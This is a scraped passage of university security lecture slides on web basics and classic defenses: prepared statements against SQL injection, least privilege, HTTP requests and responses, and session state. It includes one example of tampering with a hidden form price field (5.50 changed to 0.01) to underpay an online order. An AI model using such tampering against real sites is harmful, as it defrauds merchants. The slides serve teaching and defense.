where(name=? and password=?);”);
select / from / where
* Users and
=
name ?
=
password ?$user $pass
![Page 58: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/58.jpg)
The underlying issue$statement = $db->prepare(“select * from Users
where(name=? and password=?);”);
select / from / where
* Users and
=
name ?
=
password ?
![Page 59: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/59.jpg)
The underlying issue$statement = $db->prepare(“select * from Users
where(name=? and password=?);”);
select / from / where
* Users and
=
name ?
=
password ?
Prepare is only appliedto the leaves, so thestructure of the treeis fixed
![Page 60: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/60.jpg)
Mitigating the impact• Limit privileges
• Can limit commands and/or tables a user can access - Allow SELECT queries on Orders_Table but not on
Creditcards_Table • Follow the principle of least privilege • Incomplete fix, but helpful
• Encrypt sensitive data stored in the database • May not need to encrypt Orders_Table • But certainly encrypt Creditcards_Table.cc_numbers
![Page 61: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/61.jpg)
Web security
![Page 62: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/62.jpg)
A very basic web architecture
Browser Web server
Database
Client Server
(Private) Data
DB is a separate entity,logically (and often physically)
![Page 63: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/63.jpg)
A very basic web architecture
Browser Web server
Database
Client Server
(Private) Data
DB is a separate entity,logically (and often physically)
(Much) user data ispart of the browser
![Page 64: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/64.jpg)
Interacting with web servers
http://www.cs.umd.edu/~dml/home.html
Get and put resources which are identified by a URL
![Page 65: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/65.jpg)
Interacting with web servers
http://www.cs.umd.edu/~dml/home.html
Get and put resources which are identified by a URL
Protocolftphttpstor
![Page 66: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/66.jpg)
Interacting with web servers
http://www.cs.umd.edu/~dml/home.html
Get and put resources which are identified by a URL
![Page 67: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/67.jpg)
Interacting with web servers
http://www.cs.umd.edu/~dml/home.html
Get and put resources which are identified by a URL
Hostname/serverTranslated to an IP address by DNS (more on this later)
![Page 68: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/68.jpg)
Interacting with web servers
http://www.cs.umd.edu/~dml/home.html
Get and put resources which are identified by a URL
![Page 69: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/69.jpg)
Interacting with web servers
http://www.cs.umd.edu/~dml/home.html
Get and put resources which are identified by a URL
Path to a resource
Here, the file home.html is static content i.e., a fixed file returned by the server
![Page 70: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/70.jpg)
Interacting with web servers
http://www.cs.umd.edu/~dml/home.html
Get and put resources which are identified by a URL
Path to a resource
Here, the file home.html is static content i.e., a fixed file returned by the server
http://facebook.com/delete.php
![Page 71: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/71.jpg)
Interacting with web servers
http://www.cs.umd.edu/~dml/home.html
Get and put resources which are identified by a URL
Path to a resource
Here, the file home.html is static content i.e., a fixed file returned by the server
http://facebook.com/delete.php
Path to a resourceHere, the file home.html is dynamic content
i.e., the server generates the content on the fly
![Page 72: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/72.jpg)
Interacting with web servers
http://www.cs.umd.edu/~dml/home.html
Get and put resources which are identified by a URL
Path to a resource
Here, the file home.html is static content i.e., a fixed file returned by the server
http://facebook.com/delete.php
Here, the file home.html is dynamic content i.e., the server generates the content on the fly
![Page 73: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/73.jpg)
Interacting with web servers
http://www.cs.umd.edu/~dml/home.html
Get and put resources which are identified by a URL
Path to a resource
Here, the file home.html is static content i.e., a fixed file returned by the server
http://facebook.com/delete.php
Here, the file home.html is dynamic content i.e., the server generates the content on the fly
?f=joe123&w=16
![Page 74: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/74.jpg)
Interacting with web servers
http://www.cs.umd.edu/~dml/home.html
Get and put resources which are identified by a URL
Path to a resource
Here, the file home.html is static content i.e., a fixed file returned by the server
http://facebook.com/delete.php
Here, the file home.html is dynamic content i.e., the server generates the content on the fly
?f=joe123&w=16
Arguments
![Page 75: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/75.jpg)
Basic structure of web traffic
Browser Web server
Client Server
Database(Private) Data
![Page 76: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/76.jpg)
Basic structure of web traffic
Browser Web server
Client Server
![Page 77: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/77.jpg)
Basic structure of web traffic
Browser Web server
Client Server
HTTP
![Page 78: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/78.jpg)
Basic structure of web traffic
Browser Web server
Client Server
• HyperText Transfer Protocol (HTTP) • An “application-layer” protocol for exchanging
collections of data
HTTP
![Page 79: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/79.jpg)
Basic structure of web traffic
Browser Web server
Client Server
![Page 80: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/80.jpg)
Basic structure of web traffic
Browser Web server
Client Server
User clicks
![Page 81: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/81.jpg)
Basic structure of web traffic
Browser Web server
Client Server
HTTP Request
User clicks
![Page 82: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/82.jpg)
Basic structure of web traffic
Browser Web server
Client Server
HTTP Request
User clicks
• Requests contain: • The URL of the resource the client wishes to obtain • Headers describing what the browser can do
• Requests be GET or POST • GET: all data is in the URL itself (supposed to have no side-effects) • POST: includes the data as separate fields (can have side-effects)
![Page 85: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/85.jpg)
HTTP GET requestshttp://www.reddit.com/r/security
User-Agent is typically a browser but it can be wget, JDK, etc.
![Page 86: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/86.jpg)
![Page 87: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/87.jpg)
![Page 88: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/88.jpg)
Referrer URL: the site from whichthis request was issued.
![Page 89: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/89.jpg)
HTTP POST requestsPosting on Piazza
![Page 90: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/90.jpg)
HTTP POST requestsPosting on Piazza
![Page 91: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/91.jpg)
HTTP POST requestsPosting on Piazza
Implicitly includes dataas a part of the URL
![Page 92: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/92.jpg)
HTTP POST requestsPosting on Piazza
Explicitly includes data as a part of the request’s content
Implicitly includes dataas a part of the URL
![Page 93: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/93.jpg)
Basic structure of web traffic
Browser Web server
Client Server
HTTP Request
User clicks
![Page 94: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/94.jpg)
Basic structure of web traffic
Browser Web server
Client Server
User clicks
![Page 95: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/95.jpg)
Basic structure of web traffic
Browser Web server
Client Server
User clicks
HTTP Response
![Page 96: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/96.jpg)
Basic structure of web traffic
Browser Web server
Client Server
User clicks
• Responses contain: • Status code • Headers describing what the server provides • Data • Cookies
• State it would like the browser to store on the site’s behalf
HTTP Response
![Page 97: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/97.jpg)
<html> …… </html>
HTTP responses
![Page 98: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/98.jpg)
<html> …… </html>
Hea
ders
Dat
aHTTP
versionStatuscode
Reasonphrase
HTTP responses
![Page 99: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/99.jpg)
![Page 100: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/100.jpg)
![Page 101: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/101.jpg)
![Page 102: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/102.jpg)
HTTP is stateless• The lifetime of an HTTP session is typically:
• Client connects to the server • Client issues a request • Server responds • Client issues a request for something in the response • …. repeat …. • Client disconnects
• HTTP has no means of noting “oh this is the same client from that previous session”
• With this alone, you’d have to log in at every page load
![Page 103: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/103.jpg)
Maintaining state across HTTP sessions
• Server processing results in intermediate state
• Send the state to the client in hidden fields
• Client returns the state in subsequent responses
Browser Web server
Client Server
HTTP Request
![Page 104: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/104.jpg)
Maintaining state across HTTP sessions
• Server processing results in intermediate state
• Send the state to the client in hidden fields
• Client returns the state in subsequent responses
Browser Web server
Client Server
HTTP Request
State
![Page 105: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/105.jpg)
Maintaining state across HTTP sessions
• Server processing results in intermediate state
• Send the state to the client in hidden fields
• Client returns the state in subsequent responses
Browser Web server
Client Server
State
![Page 106: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/106.jpg)
Maintaining state across HTTP sessions
• Server processing results in intermediate state
• Send the state to the client in hidden fields
• Client returns the state in subsequent responses
Browser Web server
Client Server
HTTP Response
State
![Page 107: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/107.jpg)
Maintaining state across HTTP sessions
• Server processing results in intermediate state
• Send the state to the client in hidden fields
• Client returns the state in subsequent responses
Browser Web server
Client Server
HTTP Response
State
![Page 108: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/108.jpg)
Maintaining state across HTTP sessions
• Server processing results in intermediate state
• Send the state to the client in hidden fields
• Client returns the state in subsequent responses
Browser Web server
Client Server
HTTP Response
State
![Page 109: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/109.jpg)
Maintaining state across HTTP sessions
• Server processing results in intermediate state
• Send the state to the client in hidden fields
• Client returns the state in subsequent responses
Browser Web server
Client Server
State
![Page 110: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/110.jpg)
Maintaining state across HTTP sessions
• Server processing results in intermediate state
• Send the state to the client in hidden fields
• Client returns the state in subsequent responses
Browser Web server
Client Server
HTTP Request
State
![Page 111: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/111.jpg)
Maintaining state across HTTP sessions
• Server processing results in intermediate state
• Send the state to the client in hidden fields
• Client returns the state in subsequent responses
Browser Web server
Client Server
HTTP Request
State
![Page 112: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/112.jpg)
Maintaining state across HTTP sessions
• Server processing results in intermediate state
• Send the state to the client in hidden fields
• Client returns the state in subsequent responses
Browser Web server
Client Server
HTTP Request
State
![Page 114: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/114.jpg)
Online orderingOrder
$5.50
Order
Pay
The total cost is $5.50.Confirm order?
Yes No
socks.comsocks.com
Separate page
![Page 115: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/115.jpg)
<html><head> <title>Pay</title> </head><body>
<form action=“submit_order” method=“GET”>The total cost is $5.50. Confirm order?<input type=“hidden” name=“price” value=“5.50”><input type=“submit” name=“pay” value=“yes”><input type=“submit” name=“pay” value=“no”>
</body></html>
Online orderingWhat’s presented to the user
![Page 116: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/116.jpg)
<html><head> <title>Pay</title> </head><body>
<form action=“submit_order” method=“GET”>The total cost is $5.50. Confirm order?<input type=“hidden” name=“price” value=“5.50”><input type=“submit” name=“pay” value=“yes”><input type=“submit” name=“pay” value=“no”>
</body></html>
Online orderingWhat’s presented to the user
![Page 117: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/117.jpg)
Online ordering
if(pay == yes && price != NULL){
bill_creditcard(price);deliver_socks();
}else
display_transaction_cancelled_page();
The corresponding backend processing
![Page 118: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/118.jpg)
Online ordering
if(pay == yes && price != NULL){
bill_creditcard(price);deliver_socks();
}else
display_transaction_cancelled_page();
The corresponding backend processing
![Page 119: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/119.jpg)
<html><head> <title>Pay</title> </head><body>
<form action=“submit_order” method=“GET”>The total cost is $5.50. Confirm order?<input type=“hidden” name=“price” value=“5.50”><input type=“submit” name=“pay” value=“yes”><input type=“submit” name=“pay” value=“no”>
</body></html>
Online orderingWhat’s presented to the user
![Page 120: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/120.jpg)
<html><head> <title>Pay</title> </head><body>
<form action=“submit_order” method=“GET”>The total cost is $5.50. Confirm order?<input type=“hidden” name=“price” value=“5.50”><input type=“submit” name=“pay” value=“yes”><input type=“submit” name=“pay” value=“no”>
</body></html>
Online orderingWhat’s presented to the user
value=“0.01”
![Page 121: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/121.jpg)
Minimizing trust in the client
<html><head> <title>Pay</title> </head><body>
<form action=“submit_order” method=“GET”>The total cost is $5.50. Confirm order?<input type=“hidden” name=“price” value=“5.50”><input type=“submit” name=“pay” value=“yes”><input type=“submit” name=“pay” value=“no”>
</body></html>
What’s presented to the user
![Page 122: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/122.jpg)
Minimizing trust in the client
<html><head> <title>Pay</title> </head><body>
<form action=“submit_order” method=“GET”>The total cost is $5.50. Confirm order?<input type=“hidden” name=“price” value=“5.50”><input type=“submit” name=“pay” value=“yes”><input type=“submit” name=“pay” value=“no”>
</body></html>
<input type=“hidden” name=“sid” value=“781234”>
What’s presented to the user
![Page 123: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/123.jpg)
Minimizing trust in the client
price = lookup(sid);if(pay == yes && price != NULL){
bill_creditcard(price);deliver_socks();
}else
display_transaction_cancelled_page();
The corresponding backend processing
![Page 124: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/124.jpg)
Minimizing trust in the client
price = lookup(sid);if(pay == yes && price != NULL){
bill_creditcard(price);deliver_socks();
}else
display_transaction_cancelled_page();
The corresponding backend processing
We don’t want to pass hidden fields around all the time
![Page 125: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/125.jpg)
Statefulness with Cookies
• Server stores state, indexes it with a cookie
• Send this cookie to the client
• Client stores the cookie and returns it with subsequent queries to that same server
Browser Web server
Client Server
HTTP Request
